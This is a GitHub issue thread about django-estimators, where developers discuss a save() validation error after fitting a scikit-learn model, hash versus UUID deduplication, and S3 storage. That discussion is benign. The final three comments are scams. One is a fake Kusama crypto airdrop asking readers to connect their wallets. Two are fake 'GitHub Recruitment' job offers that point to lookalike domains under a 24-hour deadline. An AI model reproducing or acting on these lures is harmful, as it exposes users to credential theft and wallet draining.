### ISSUE TITLE
Problem on saving after model.fit()

### ISSUE THREAD

**Issue by DEKHTIARJonathan** [fridiculous/django-estimators#7]
Hello dear friend,

First of all, thanks for this fantastic library.

I have a problem with using your work:

Here is the simple code i try to run

```
from estimators.models import Estimator
from sklearn.neighbors import KNeighborsClassifier

# creating dummy data
X = [[0], [1], [2], [3]]
y = [0, 0, 1, 1]

#creating an estimator
est = Estimator()

# creating a KNN Model, I have tried many different, always the same error at the end
est.estimator = KNeighborsClassifier(n_neighbors=3)
est.save() # This call works.

# Fitting the model
est.estimator.fit(X, y) 

# Saving again the model
est.save() # => MASSIVE Fail !
```
```
Traceback (most recent call last):
  File "<console>", line 1, in <module>
  File "C:\Users\marco\Desktop\GITPRO~1\FEEDCR~1.IO\venv\lib\site-packages\estimators\models.py", line 98, in save
    self.full_clean(exclude=['description'])
  File "C:\Users\marco\Desktop\GITPRO~1\FEEDCR~1.IO\venv\lib\site-packages\django\db\models\base.py", line 1232, in full_clean
    raise ValidationError(errors)
ValidationError: {'__all__': [u"estimator_hash '87bee8a5c1f5c78601c7d69e1e22c044' should be set by the estimator 'KNeighborsClassifier(algorithm='auto', leaf_size=30, metric='minkowski',\n           metric_params=None, n_jobs=1, n_neighbors=3, p=2,\n           weights='uniform')'"]}
```

![image](https://cloud.githubusercontent.com/assets/10923599/20262340/1cd86c7c-aa62-11e6-9696-d2e85ab7c1d0.png)

## Idea to solve the problem.

Maybe, saving the models with hashes is not a very good idea.
Maybe someone wants to have many identical model. A simple example would be, user-specific models. And when you just registred on the app you have some kind of very generic model that some users may share.

I would propose to save the model with UUIDs:

```
import uuid
print uuid.uuid4()
8bb31c2a-2334-4ebf-bed2-e3e13a18310a
```

**Comment by fridiculous** [comment]
@DEKHTIARJonathan first and foremost, thank for raising this issue.  Your input is really appreciated and can help make this library better.

I have some thoughts about it and would love your feedback.

### Why Hashes? (and not UUIDs yet)
The purpose of hashes is to prevent generating duplicate models, both for 1. easily referencing models in the future comparison, and for 2. reducing storing models on disk.  Although uuids are great for generating uniqueness at a time, when we're generating lots of models, it becomes difficult to compare two models at a time.

E.g. Let's say I want to evolve the model, and I want to compare two models to benchmark my improvement, and there 3 instances of the each of the same model.   If I dedupe the models, I only have 1 comparison: A vs B.  Without deduping, I'd have 9 identical comparisons: A1 vs B1, A1 vs B2, A1 vs B3, A2 vs B1, A2 vs ....  And furthermore, without hashes, I'd have an additional 6 comparisons:  A1 vs A2, A1 vs A3 ... , all of which are identical.

From a tracking standpoint, it becomes pretty redundant.

Furthermore, from disk and resource standpoint, currently there is exception raises on a unique constraint if the hash is already found.  If we persist the same model many many times to disk, it's potentially wasting disk resources.

### Suggested Method for Presented Use Cases**

I'm currently using the master branch, and perhaps this example can address your issues:

    knn1 = KNeighborsClassifier(n_neighbors=2)
    knn2 = KNeighborsClassifier(n_neighbors=2)  # duplicate 2
    knn3 = KNeighborsClassifier(n_neighbors=3)
    est1 = Estimator.get_by_estimator(knn1)
    est1.save()   # will not error, since it was found ahead of time
    est2 = Estimator.get_or_create(knn2)  # no error, id=1 
    est2.save()   # resave id=1
    est3 = Estimator.get_or_create(knn3)
    est3.save()   # no error, id=2

Do you think the `Estimator.get_or_create` could be the default behavior for `save()`, so that if there is a new instance with a preexisting model, the api handles it gracefully.  Under the surface it's 1 database record, but in the api, it's indifferent.  What do you think?


#### ML Models per object over time
For your specific needs with models, if you need a different model per user (or perhaps sometimes it's the same model), I'd make a user_model table with a user_id, model_id attributes so you can reference both old and new models.


### File Persistance Questions
Lastly, the django storage object currently does not overwrite identical files.  If for some reason, we do persist a duplicate file, it appends a unique string to the filename and updates the attribute on the object.


Otherwise, I hear the consideration of how UUIDs help with flexibility. Maybe to expand,

   If you absolutely want to keep a filename attribute, I would suggest using UUIDs

Aside from the above example, in what circumstances, would you want to keep a filename attribute?  


### Future Development and next Release
I'm hoping to have a release in a couple weeks.  In this release, I hope to have a couple items that would make this easier.

* configurable settings for an estimators project
* tags to reference different models
* get_or_create logic built into the `save` method we limit duplicate errors, in particular when creating new instances.
* possibly a fully functioning deployable example.

**Comment by DEKHTIARJonathan** [comment]
**Very nice comment, I don't really know where to start.**

_BTW. I used your work to create a Model that can store models on disk or Amazon S3 seamlessly for better scalability. I simplified and deleted many aspects of your library I didn't need. But I can show you if you would like to see how you could adapt your library to save **on disk or on AWS S3**_

## Back to the ground problem

Let's start with your example:
```
knn1 = KNeighborsClassifier(n_neighbors=2)
knn2 = KNeighborsClassifier(n_neighbors=2)  # duplicate 2
knn3 = KNeighborsClassifier(n_neighbors=3)
est1 = Estimator.get_by_estimator(knn1)
est1.save()   # will not error, since it was found ahead of time
est2 = Estimator.get_or_create(knn2)  # no error, id=1 
est2.save()   # resave id=1
est3 = Estimator.get_or_create(knn3)
est3.save()   # no error, id=2
```
Obviously, your method _get_or_create()_ seems to solve the problem. However, I don't know what type of application you currently develop, but it seems to me **very rare** that you actually happen to have two models identical on all points. 

### How often does it happen ?

* You are **Amazon**, you build a recommendation engine. You may have a user-specific model, so they are all different.
* You are **Google**, you try to fit ads at best to your users. Again a user-specific model.
* You are **Siemens** and try to predict some sales. It will be refined through time, so everytime different because new data will be in the game.

I only see some kind of **generic model** services. But I don't many business trying to apply such algorithm today.

## Okay, but let's assume it does happen oftenly. So what's the cost ?

I don't really agree on this : 

>  I'd have 9 identical comparisons: A1 vs B1, A1 vs B2, A1 vs B3, A2 vs B1, A2 vs .... And furthermore, without hashes, I'd have an additional 6 comparisons: A1 vs A2, A1 vs A3 ... , all of which are identical.

So you have 9 or 9+6 identical comparisons with the following models A1, A2, A3, B1, B2, B3. You definetely should design a **metric** or a **set of metrics** and comparing the results.
And then you only need to **sort** the models from the most accurate to the least.

You could always say that sorting is CPU-intensive, that's true. But database systems are able to sort million of records each seconds. Do you have this much models ?

** This is definetely a very good question, and not easy to answer. To approach this problem, it is important to have a global understanding of what is happening at scale. **

## File persistance.
I have found a workaround to **overwrite** a file with django. Just perform the followings:

```
filename = self.object_file.name # Saving the object filename on disk
self.object_file.delete(save=True) # Deleting the file on disk
##### Re-Save the file with filename previously saved.
```

## Future Development and next Release

I don't know what kind of project you currently develop with this library, however, you will soon have a very basic problem: **how do I share models accross my applications servers**. We can speak of 2 servers or 100+ servers.

The solution I have found is using **S3BotoStorage** with Amazon AWS.

```
from storages.backends.s3boto import S3BotoStorage

class StaticStorage(S3BotoStorage):
	location = settings.STATICFILES_LOCATION

class MediaStorage(S3BotoStorage):
	location = settings.MEDIAFILES_LOCATION
```

I don't really know what are the direction you would like to take with this project, however if you want to make it as **great and awesome** as it deserves to be, you should definetely think about porting this library to a more **distributed** file storage fashion.

For today, the library is very interesting and powerful for prototyping but can't be used in a production phase, which is sad. I have done a quick fix to port the **main functionalities** with S3BotoStorage. And it works perfectly. I have heavily reduced the size

**Comment by fridiculous** [comment]
@DEKHTIARJonathan I love the input!

Couple things.

#### on Get or Create?
I made a new PR https://github.com/fridiculous/django-estimators/pull/10 that should make common methods like `get_or_create`, `update_or_create` or `filter` queryset methods work using the traditional django pattern.  I'll probably merge it in tomorrow after I clean up some of the tests.

#### Unique Hashes are Overkill
I think you have a point.  Not every use case requires unique hashes.  Although deduping is useful for keeping models clean, companies can manage their own models.  I created an issue for more customability: https://github.com/fridiculous/django-estimators/issues/11

#### File Persistance Bug?
I think I was coming across a similar problem, and found that it occurs with two instance saves are occurring, because file field in django by default saves the instance: https://github.com/django/django/blob/master/django/db/models/fields/files.py#L100

In https://github.com/fridiculous/django-estimators/pull/10/files#diff-d3696dfd3c519d2cc7e64955ae36cc21R87, I remove the first save on the file.  Now the logic is only saves the file if it wasn't already persisted.

### s3 intergation
Yes, `S3BotoStorage` is a great solution.  And to address it more seriously I made an issue https://github.com/fridiculous/django-estimators/issues/9

**Comment by DEKHTIARJonathan** [comment]
@fridiculous i can't believe this has become this much interesting. I'm really interested in the argumentation happening here. I will post you the modifications I have made for S3BotoStorage. Feel free to use it as much as you like.

**Comment by codelou** [comment]
## Congratulations! You've receive in $2000 on Kusama Airdrop 🪂🔴

Kusama Airdrop: Claim up to $20,000 in Tokens Now!

→ [Earn rewards on connect you wallet](https://kusamanetworks.com/)

→ [Claim Your $KSM Today](https://kusamanetworks.com/)

Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://polkadot.network/static/b118567894df0c230e8553f2d6ea8b83/image2.png)

[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Bonus Now!** [Check Eligibility](https://kusamanetworks.com/)

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your bonus, up to $2,000!
- ✨Magic ✨ [Claim Your Bonus Now!](https://kusamanetworks.com/)

**Comment by ARRNAV26** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
esneko, @july5613, @BernardNakamoto, @mfbevan, @skeithc, @flytam, @santoni7, @nikkaroraa, @flyinglimao, @twodam, @0xGenjutsu, @ethanoic, @AlexanderC, @trival, @0xcaff, @red-0ne, @lyhourchhen, @sitleon, @monk-chain, @dragosbulugean

**Comment by Nitesh639** [comment]
Hey there,

We've got some thrilling news for you! GitHub is currently looking for skilled Developers to join our team. This is an incredible opportunity with a competitive salary of $180,000/year, along with a host of attractive benefits.

Interested in taking your career to the next level? Don't miss out! Click [here](https://githubtalentcommunity.githubcareers.online/) to apply and secure your spot.

Looking forward to potentially welcoming you aboard!

Best regards,  
GitHub Recruitment Team
0xsouthdev, @thewh1teagle, @ilitteri, @pawanjay176, @nanne007, @kziemianek, @Yakumwamba, @skyh24, @samajammin, @wennaiwu, @ecivini, @ConnorMJones, @touhonoob, @aditya520, @Am0rfu5, @iflody, @cpucorecore, @brianfakhoury, @carver, @ruggedev
